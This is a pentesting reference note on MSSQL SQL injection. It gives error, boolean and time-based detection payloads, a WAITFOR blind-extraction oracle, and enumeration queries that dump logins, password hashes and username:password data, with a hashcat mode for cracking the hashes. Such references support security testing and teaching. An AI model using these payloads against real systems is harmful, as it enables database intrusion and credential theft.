MSSQL.md

Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft, sold in a dozen different editions with differing feature sets. How to determine the version, edition and update level of an instance is documented at: https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version-edition-and-update-level-of-sql-server-an

MSSQL supports stacked queries: statements separated by `;` in the same batch are executed in turn, so an injection point can usually be used to run an arbitrary additional statement (for instance `WAITFOR DELAY`) after the application's own query.

Vulnerable parameters detection

Injection locations

In an HTTP request there are a few common injection points:

  • URL parameters

  • POST parameters

  • Cookie names and values

  • Host header and any custom headers

Note that while the entry points above are the most common, any content in an HTTP request can be prone to SQL injection.

Injection detection

Detecting vulnerable parameters is most easily done by triggering errors and boolean logic within the application. Supplying malformed input will trigger database errors, and sending syntactically valid input carrying different boolean conditions may produce different responses from the web server. Time-based payloads can also be used to detect SQL injection in MSSQL, since `WAITFOR` delays the response by a controlled amount regardless of what the page displays.

| Technique | Behaviour | Queries |
|---|---|---|
| Error | A direct error message can be returned, or the page may act differently | `x='`, `x=''`, `x="`, `x=""`, `x=\`, `x=\\`, `x=\'`, ... |
| Boolean testing | The page can react differently depending on whether the injected condition is true or false | `x=1 or 1=1` (true), `x=1' or 1=1` (true), `x=1" or 1=1` (true), `x=1 or 1=2` (false), ... |
| Time based | A delay can be induced by the query execution | `x=1 WAITFOR DELAY '0:0:5'` (wait 5 seconds), `x=1; WAITFOR DELAY '0:0:5'` (wait 5 seconds), `x=1 WAITFOR TIME '22:42'` (wait until 22:42), ... |

When the parameter is injected inside a quoted string, the application's own trailing quote has to be neutralised, either by terminating the payload with a comment (`--` or `/*`) or by re-balancing the quotes (`x=1' or '1'='1`); otherwise the boolean and time-based payloads above only produce a syntax error.

Automated detection

The detection of vulnerable parameters can be automated, using the BurpSuite Pro scanner or sqlmap for example.

Note that second-order SQL injection, which arises when user-supplied data is first stored by the application and later incorporated into a SQL query in an unsafe manner, may not be properly detected by automated tools, because the payload is executed by a different request than the one that supplied it.
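The following T-SQL is an added example, not part of the original notes, showing how the detection payloads above land inside a hypothetical concatenated query (`SELECT id, name FROM products WHERE id = <x>` and its string-context variant) and how, once a delay has confirmed the injection, the same `WAITFOR` primitive becomes a conditional oracle that leaks data one comparison at a time. The `products` table and the column names are assumptions.

```sql
-- Added example (not from the original notes). The application query is assumed to be
-- built by string concatenation from the parameter x; 'products' is a hypothetical table.

-- Numeric context:  SELECT id, name FROM products WHERE id = <x>
-- x=1 or 1=1  -> every row is returned (true)
SELECT id, name FROM products WHERE id = 1 or 1=1;
-- x=1 or 1=2  -> only row 1 is returned (false)
SELECT id, name FROM products WHERE id = 1 or 1=2;
-- x=1 WAITFOR DELAY '0:0:5'  -> T-SQL does not require ';' between statements, so
-- WAITFOR simply starts a second statement right after the SELECT
SELECT id, name FROM products WHERE id = 1 WAITFOR DELAY '0:0:5';

-- String context:  SELECT id, name FROM products WHERE name = '<x>'
-- x='  -> unbalanced quote, "Unclosed quotation mark" error (error-based detection):
--   SELECT id, name FROM products WHERE name = ''';
-- x=1' or 1=1--  -> the comment discards the application's trailing quote
SELECT id, name FROM products WHERE name = '1' or 1=1--';
-- x=1'; WAITFOR DELAY '0:0:5'--  -> stacked query in string context
SELECT id, name FROM products WHERE name = '1'; WAITFOR DELAY '0:0:5'--';

-- From detection to a blind oracle: make the delay depend on one fact about the data.
-- Sleeps 5 seconds only if the first character of the current login sorts above 'M' (77).
-- x=1; IF (ASCII(SUBSTRING(SYSTEM_USER,1,1)) > 77) WAITFOR DELAY '0:0:5'--
SELECT id, name FROM products WHERE id = 1; IF (ASCII(SUBSTRING(SYSTEM_USER,1,1)) > 77) WAITFOR DELAY '0:0:5'--;

-- Boolean variant of the same oracle, for pages that render differently on true/false.
-- x=1 AND ASCII(SUBSTRING(SYSTEM_USER,1,1)) > 77
SELECT id, name FROM products WHERE id = 1 AND ASCII(SUBSTRING(SYSTEM_USER,1,1)) > 77;
```

Binary-searching the `> 77` threshold recovers each character in about seven requests; the same `IF ... WAITFOR DELAY` or `AND ...` wrapper works around any scalar subquery, which is what the dumping queries in the next section are for.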

Databases dumping

| Description | Queries | Comments |
|---|---|---|
| Comments | | |
| Encoding queries | | |
| Obfuscating queries | | |
| Disable logging mechanisms | | |
| MSSQL version | | |
| Current user | `SELECT (CAST(SYSTEM_USER AS NVARCHAR(4000)))` | |
| Users and privileges | | |
| Users' passwords | | Using sqlmap: `sqlmap -D master -T sys.sql_logins --dump [...]` |
| Databases | | |
| Current database | `SELECT (CAST(DB_NAME() AS NVARCHAR(4000)))` | |
| Tables | | |
| Columns | | |
| Data | | |
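The queries below are an added example, not part of the original notes, covering the enumeration steps of the table above with MSSQL system views, including the single-row and single-value forms that blind and error-based injection need. The database name `app`, the table `users` and its columns are hypothetical placeholders.

```sql
-- Added example (not from the original notes): MSSQL enumeration queries for the dumping
-- steps above. Database 'app', table 'users' and its columns are hypothetical placeholders.

-- MSSQL version (the @@version string includes edition, build and host OS)
SELECT @@version;
SELECT SERVERPROPERTY('ProductVersion'), SERVERPROPERTY('Edition');

-- Current login, current database user, and sysadmin membership (1 = member, 0 = not)
SELECT SYSTEM_USER, USER_NAME(), IS_SRVROLEMEMBER('sysadmin');

-- Users and privileges: server logins and the fixed server roles they hold
SELECT p.name AS login_name, p.type_desc, r.name AS server_role
  FROM sys.server_principals p
  LEFT JOIN sys.server_role_members m ON m.member_principal_id = p.principal_id
  LEFT JOIN sys.server_principals r ON r.principal_id = m.role_principal_id
 WHERE p.type IN ('S', 'U', 'G');

-- Users' passwords: SQL login hashes. password_hash is NULL unless the current login holds
-- CONTROL SERVER; the 0x0200... hashes crack offline with hashcat mode 1731 (2012+ format)
SELECT name, CONVERT(VARCHAR(512), password_hash, 1) AS password_hash FROM master.sys.sql_logins;

-- Databases: all at once, or one at a time when only a single value can be extracted
SELECT name FROM sys.databases;
SELECT DB_NAME(1), DB_NAME(2), DB_NAME(3);                                          -- by database_id
SELECT name FROM sys.databases ORDER BY name OFFSET 4 ROWS FETCH NEXT 1 ROWS ONLY;  -- 5th name (2012+)
SELECT TOP 1 name FROM sys.databases WHERE name NOT IN ('master','tempdb','model','msdb');

-- Current database
SELECT DB_NAME();

-- Tables of a given database: three-part names avoid USE, which an injection rarely allows
SELECT TABLE_SCHEMA, TABLE_NAME FROM app.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';
SELECT name FROM app.sys.tables;

-- Columns of a table
SELECT COLUMN_NAME, DATA_TYPE FROM app.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users';

-- Data: concatenate columns (and rows) so everything comes back through one cell
SELECT TOP 1 username + ':' + password FROM app.dbo.users;
SELECT username + ':' + password + ';' FROM app.dbo.users FOR XML PATH('');   -- all rows, any version
SELECT STRING_AGG(username + ':' + password, ';') FROM app.dbo.users;        -- SQL Server 2017+

-- Error-based extraction: force a conversion failure so the value is echoed in the error,
-- e.g. "Conversion failed when converting the nvarchar value 'Microsoft SQL Server ...' to data type int."
SELECT 1 WHERE 1 = CONVERT(INT, (SELECT @@version));
SELECT 1 WHERE 1 = CONVERT(INT, (SELECT TOP 1 name FROM sys.databases ORDER BY name));
```

In an injection each `SELECT` becomes a scalar subquery inside the detected payload form (`' AND 1=CONVERT(INT,(...))--` for error-based, `IF (...) WAITFOR DELAY` for blind), so the `TOP 1` / `OFFSET ... FETCH` variants matter: they walk a result set one row per request when only one value can be read at a time.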


